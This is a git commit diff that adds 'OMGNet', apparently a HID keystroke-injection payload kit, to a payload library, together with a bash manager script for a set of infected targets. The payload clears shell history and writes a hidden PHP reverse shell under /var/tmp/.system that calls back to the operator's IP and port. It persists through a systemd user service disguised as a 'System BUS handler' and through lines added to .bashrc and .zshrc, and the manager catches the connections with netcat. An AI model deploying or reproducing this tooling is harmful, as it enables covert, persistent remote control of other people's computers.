uploading OMGNet

OMGNet is cluster of systems infected with persistentReverseOMG which are manged by OMGNetManager.
2023-07-09 19:59:18 +05:30 · 2023-07-09 19:59:18 +05:30 · 7b628f2753
parent 0981da652b
commit 7b628f2753
4 changed files with 218 additions and 0 deletions
--- a/payloads/library/remote_access/OMGNet/OMGNetManager
+++ b/payloads/library/remote_access/OMGNet/OMGNetManager
@ -0,0 +1,135 @@
+#!/bin/bash
+allowAbort=true;
+myInterruptHandler()
+{
+    if $allowAbort; then
+	echo
+        echo -e "\n\033[1mYou terminated OMGNetManager...\033[0m" && exit 1;
+    fi;
+}
+trap myInterruptHandler SIGINT;
+echo -e "\033[4m\033[1mWelcome to OMGNet Manager!!!\033[0m"
+echo
+echo -e "1]  Connect with target.\n2]  Create new target.\n3]  List available target.\n4]  Remove target.\n5]  Update target."
+echo
+read -p "Enter your choice: " ch
+create () {
+	read -p "Enter Target's name(without whitespaces): " name
+	if [[ $(grep -oh "\w*$name\w*" ~/.config/OMGNet/OMGNet.db) == $name ]]; then
+		echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0mName \"$name\" already exists."
+		exit 1
+	fi
+	read -p "Enter Servers IP: " ip
+	read -p "Enter Unique Port Number(1500-65535): " port
+	if [[ $(grep -oh "\w*$ip\w*" ~/.config/OMGNet/OMGNet.db) == $ip ]] && [[ $(grep -oh "\w*$port\w*" ~/.config/OMGNet/OMGNet.db) == $port ]]; then
+                echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0mTarget exist with similar IP address \"$ip\" and port number \"$port\"."
+                exit 1
+        fi
+	max=65535
+	min=1500
+	read -p "Specify directory for output: " dir
+	if [ ! -d "$dir" ]; then
+  		echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0m\"$dir\" no such directory."
+		exit 1
+	else
+		cp -r ~/.config/OMGNet/payload $dir
+	fi
+	
+	if [[ $ip =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && (( $port <= $max )) && (( $port >= $min )); then
+  		sed -i -e "s/0.0.0.0/$ip/g" $dir/payload
+		sed -i -e "s/4444/$port/g" $dir/payload
+		echo -e "$(echo "$name"|xargs)\t$ip\t$port" >> ~/.config/OMGNet/OMGNet.db
+		read -p "Do you want payload encoded(y|n): " enc
+	else 
+  		echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0mInvalid IP address \"$ip\" or Port number \"$port\"."
+		exit 1
+	fi
+
+}
+list () {
+	
+	column -t -o '  ' ~/.config/OMGNet/OMGNet.db | awk '{print NR" - "$0}'	
+}
+remove () {
+	echo
+	list
+	echo
+	read -p "Enter name of target to remove: " rmv
+	if grep -q $rmv ~/.config/OMGNet/OMGNet.db; then
+    		sed -i "/\b\($rmv\)\b/d" ~/.config/OMGNet/OMGNet.db
+		echo -e "\033[0;32m\e[1mOMGNetManager:Success:\e[0mRemoved \"$rmv\"."
+	else
+    		echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0m\"$rmv\" no such target found."
+	fi
+}
+update () {
+	echo
+	list
+	echo
+	read -p "Choose target number: " cho
+	read -p "You want to update (ip|port): " ent
+	if [ "$ent" = ip ]
+	then
+		one=$(sed ""$cho\!d"" ~/.config/OMGNet/OMGNet.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
+		read -p "Enter new ip: " use
+		if [[ $use =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
+			sed -i -e "$cho s/$one/$use/g" ~/.config/OMGNet/OMGNet.db
+			echo -e "\033[0;32m\e[1mOMGNetManager:Success:\e[0mUpdated IP."
+		else
+			echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0mInvalid IP address \"$use\"."
+			exit
+		fi
+	elif [ "$ent" = port ]
+	then
+		two=$(sed ""$cho\!d"" ~/.config/OMGNet/OMGNet.db | awk '{print $ 3}')
+		read -p "Enter new Port number: " useP
+		max=65535
+		min=1500
+		if (( $useP <= $max )) && (( $useP >= $min )); then
+			sed -i -e "$cho s/$two/$useP/g" ~/.config/OMGNet/OMGNet.db
+			echo -e "\033[0;32m\e[1mOMGNetManager:Success:\e[0mUpdated Port number\"$ent\"."
+		else
+			echo -e "\033[0;31m\e[1mOMGNet:Error:\e[0mInvalid Port Number \"$useP\"."
+		fi
+	else
+		echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e0m[Invalid choice \"$ent\"."
+	fi
+}
+connect () {
+	echo
+	list
+	echo
+	read -p "Enter Target number to connect: " cho
+	one=$(sed ""$cho\!d"" ~/.config/OMGNet/OMGNet.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
+	two=$(sed ""$cho\!d"" ~/.config/OMGNet/OMGNet.db | awk '{print $ 3}')
+	read -p "Do you want to listen on local address(y|n): " src
+	if [ "$src" = n ]
+	then
+		echo -e "Listning on IP address \"$one\" and Port number \"$two\"...."
+		nc -lv -s $one -p $two
+	elif [ "$src" = y ]
+	then
+		echo -e "Listning on Port number \"$two\"...."
+		nc -nvlp $two
+	else
+		echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0mInvalid choice \"$src\"."
+	fi
+}
+if [ "$ch" = 1 ]
+        then
+                connect
+elif [ "$ch" = 2 ]
+        then
+                create
+elif [ "$ch" = 3 ]
+        then
+                list
+elif [ "$ch" = 4 ]
+        then
+                remove
+elif [ "$ch" = 5 ]
+        then
+                update
+else
+	echo -e "\033[0;31m\e[1mOMGNet:Error:\e[0mInvalid choice \"$ch\"."
+fi 
--- a/payloads/library/remote_access/OMGNet/README.md
+++ b/payloads/library/remote_access/OMGNet/README.md
@ -0,0 +1,28 @@
+# OMGNet
+
+## About:
+* Title: OMGNet
+* Description: Create, Encode, Inject, Spread your OMGNet and manage it using OMGNetManager.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Remote Access
+* Target: Unix-like operating systems with systemd.
+* Attackmodes: HID
+
+## OMGNet is cluster of systems infected with persistentReverseOMG which are manged by OMGNetManager.
+
+### Functions:
+* Connect to target.
+* Create new target.
+* List targets.
+* Remove target.
+* Update target.
+
+### Installation:
+Use ``install.sh`` script to install OMGNetManager.
+
+### Usage:
+Use command ``OMGNetManager``.
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
--- a/payloads/library/remote_access/OMGNet/install.sh
+++ b/payloads/library/remote_access/OMGNet/install.sh
@ -0,0 +1,5 @@
+mkdir ~/.config/OMGNet
+mv payload ~/.config/OMGNet/
+touch ~/.config/OMGNet/OMGNet.db 
+chmod +x OMGNetManager
+sudo mv OMGNetManager /bin/
--- a/payloads/library/remote_access/OMGNet/payload
+++ b/payloads/library/remote_access/OMGNet/payload
@ -0,0 +1,50 @@
+REM Title: OMGNet
+REM Description: Create, Encode, Inject, Spread your OMGNet and manage it using OMGNetManager.
+REM AUTHOR: drapl0n
+REM Version: 1.0
+REM Category: Remote Access
+REM Target: Unix-like operating systems with systemd.
+REM Attackmodes: HID
+
+REM [keeping tracks clear]
+DELAY 500
+CTRL-ALT t
+DELAY 400
+STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE 
+ENTER
+DELAY 100
+
+REM [creating reverse shell]
+STRING mkdir /var/tmp/.system
+ENTER
+DELAY 100
+STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/bin/sh -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" >  /var/tmp/.system/systemBus
+ENTER
+DELAY 100
+STRING chmod +x /var/tmp/.system/systemBus
+ENTER
+DELAY 100
+
+REM [creating non-root systemd service]
+STRING mkdir -p ~/.config/systemd/user
+ENTER
+DELAY 100
+STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
+ENTER
+DELAY 100
+
+REM [enabling service]
+STRING systemctl --user daemon-reload
+ENTER
+STRING systemctl --user enable --now systemBUS.service
+ENTER
+STRING systemctl --user start --now systemBUS.service
+ENTER
+DELAY 100
+
+REM [autostarting service on terminal/shell launch]
+STRING echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.bashrc\nfi\n\n" > ~/tmmmp
+ENTER
+DELAY 50
+STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
+ENTER